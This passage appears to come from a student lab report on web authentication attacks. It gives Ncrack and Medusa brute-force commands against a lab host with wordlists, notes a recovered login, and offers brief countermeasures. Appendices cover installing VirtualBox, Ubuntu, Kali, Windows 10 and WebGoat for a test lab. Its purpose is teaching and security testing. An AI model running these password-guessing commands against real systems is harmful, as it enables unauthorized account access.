developer to find poor passwords to be a secure network by testing all host in
that network.
To do this attack, we need to type Ncrack in
command and it will show the option and how can be used Ncrack to start
attacking the HTTP authentication, so from the list need -U that for suggesting
usernames, -P that for suggesting passwords, and URL of the website. So, the
command is (ncrack -U username.txt -P
password.txt http://209.165.201.18).
Medusa
Medusa is a tool to login brute-force. This tool supports many different protocols such as HTTP, AFP, FTP, IMAP, rlogin, CVS, SSH, Subversion, VNC, and more.
For doing this attack, here comes a need to type Medusa in command and will show the option and how it can be used Medusa to start attacking the HTTP authentication. So, from the list need -U that for suggesting usernames, -P that for suggesting passwords, -h URL for the website, -M name of protocol, and -f for stop scanning after first valid found. So, the command is (medusa -h 209.165.201.18/auth-basic -U username.txt -P password.txt -M http -f).
As, shown in figure 55, the Medusa tool finds the username talal and the password 111 that highlighted in yellow
prevent http authentication hacking
The perform rapid dictionary attacks
tools work on the error messages if that is one of 400 type errors, will try
until getting the HTTP 200 OK response. so, can secure the web server by giving
the HTTP 200 OK response, that will be difficult for an attacker to distinguish
it valid or invalid login.
For stopping this way of attacks,
random content is added on the page by a graphic that cannot the login
brute-force tools can read, such as GIF, JPG or PNG format, thus the user needs
to be on the web page to attempt a login to the page. Figure 56 shows an
example of a graphic.
On the other hand, it can use the web tools scanners that help to discover the weakness in the website, and avoid a different type of attacks.
for their more, need a strong username and password, there are some common username and password, that is used by attackers to guess the authentications. shown in the following table
Install and
set up the VirtualBox:
From the
official site download, the exe file https://www.virtualbox.org/wiki/Downloads
For this project the version 6.0.6 it has chosen, after download, the exe file double clicks on the exe file and then follow the setup wizard as the figure 24
After clicking on the next button, it
will show a new window same as figure 25.
In this step, it selects the features and how to want to install also the location of where to want to install the VirtualBox. And then, click on the next button will show a new window same as figure 26
In this step, there is option shown in
figure 26, for example, the shortcut on the desktop, the user chooses one or
all the up to the user need. And then click on the next button will start to
install when it finishes will start the VirtualBox with welcome screen same
figure 27.
Finally, the VirtualBox is ready to run the new OS as virtualization.
Appendix2:
Install and
set up Ubuntu
Download the
IOS file from the official site of Ubuntu https://www.ubuntu.com/download
in this
project and use the all OS in the virtual so to install new machine will open
the VirtualBox
and add new machine as shown in figure 28
To create a new virtual machine first need to name it and the type of OS, in this, need Linux and then the version is Ubuntu 64 bit. And click Next button.
When the Next
button clicked will show the new window that in figure 29
In this window, you can control the memory size by default the VirtualBox gives the recommended size and the user can add more size. Then the next button as shown in figure 30.
In figure 30, the hard disk or storage VirtualBox gives the recommended size and the recommended option of hard disk type, there are 3 different types of hard disks. The first one is no add hard disk for this OS, the second is to create a virtual hard disk and this the recommended option, third one is using existing virtual hard disk. After choosing the recommended option, click on create button which will show the window in figure 31.
In the creation of the virtual hard disk, there are three options. The first one is VDI which is VirtualBox disk image, the second is VHD virtual hard disk, and the third is VMDK virtual machine disk. The recommended is VDI. Moving on, click Next just as window in figure 32.
In this step of creating the hard disk, there are two options. The first is dynamically allocated that means the size of the disk will not be taken of the host will take as need, the option second fixed size. The recommended one is dynamically. Then click next and the window just as in figure 33.
In this step, the process is to choose a name and location for the new virtual hard disk and then the size. And click create. When click on create this is the last step to do with VirtualBox. Then move to install the Ubuntu. Just need double click on the new virtual machine. In figure 34 shows after a click on the new virtual machine.
In this step, just IOS is required to find Ubuntu to start to install it, after locating the IOS click start and then will show the install window same as figure 35
The first window comprises of two options. One is to try Ubuntu and the second one is for installing it, the option needed is to install Ubuntu, clicking on it then will see the next window in as shown figure 36.
This is for choosing the keyboard language or layout, after that the how the user wants to install the OS custom or recommended after that the formatting the disk, Then click continue in the figure 37.
Here, the process is to choose the region and click continue as shown in figure 38.
In this step, create user name and password, and continue this is the last step and then the installation will start, and Ubuntu is ready for use
Appendix3:
Install and
set up Kali
This version of Kali is Cisco version
so, it will import the copy by VirtualBox. To import the copy of any copy with
VirtualBox from the bar tool, choose File and import application into
VirtualBox, and the new window will open as shown in figure 39.
In the first window, the process is to locate the cope in the host machine with the format of OVF. Then, clicking next will show the new window in figure 40.
This is the last step of importing the copy of the virtual OS just click on the import button as shown in figure 40, then the Kali Linux will be on the list.
Appendix4:
Install and
set up windows 10
Download the
IOS file from the official site of windows
https://www.microsoft.com/en-gb/software-download/windows10
This is the same steps to install Ubuntu, the difference when choosing the IOS file will choose Windows 10, the installer of Windows 10 as shown in figure 41.
Figure 41 shows the first window to install windows 10. There is a need to choose the language, Time and format, and keyboard or input method. Then, clicking next will show the next window as shown in figure 42.
This window has the button of install and when clicked, it will go to the next window of license terms, accept and click next. Clicking on next will open the new window as shown in figure 43.
This window has two options: upgrade or custom install. In this case, install new Windows 10. Clicking on it will open a new window as shown in figure 44.
This window is for locating the installation, click next because the new hard disk was created for the Windows 10. Clicking next will start the installation as shown in figure 45.
Then, the Windows 10 will be ready for use.
Appendix5:
The project
plans
Action plan for Work package Plan
attack
Appendix6:
Install and
setup WebGoat 8
WebGoat will
be install on Ubuntu, to install it need to get the jar file from https://github.com/WebGoat/WebGoat and from the GitHub site
go to releases https://github.com/WebGoat/WebGoat/releases
in this project was chosen
v8.0.0.M21, by download the jar file on Ubuntu, so to be able to run WebGoat 8
need to install java 11 to run the WebGoat 8, no need to install Tomcat because
the V8 of WebGoat has it, then from terminal run the command bellow
Java - - add-modules java.xml.bind -jar
webgoat-server-8.0.0.M21.jar
And WebGoat
will start, need to open browser and in the URL place type
(localhost:8080/WebGoat) then the WebGoat login page will be shown
Discuss your homework for free! Start chat
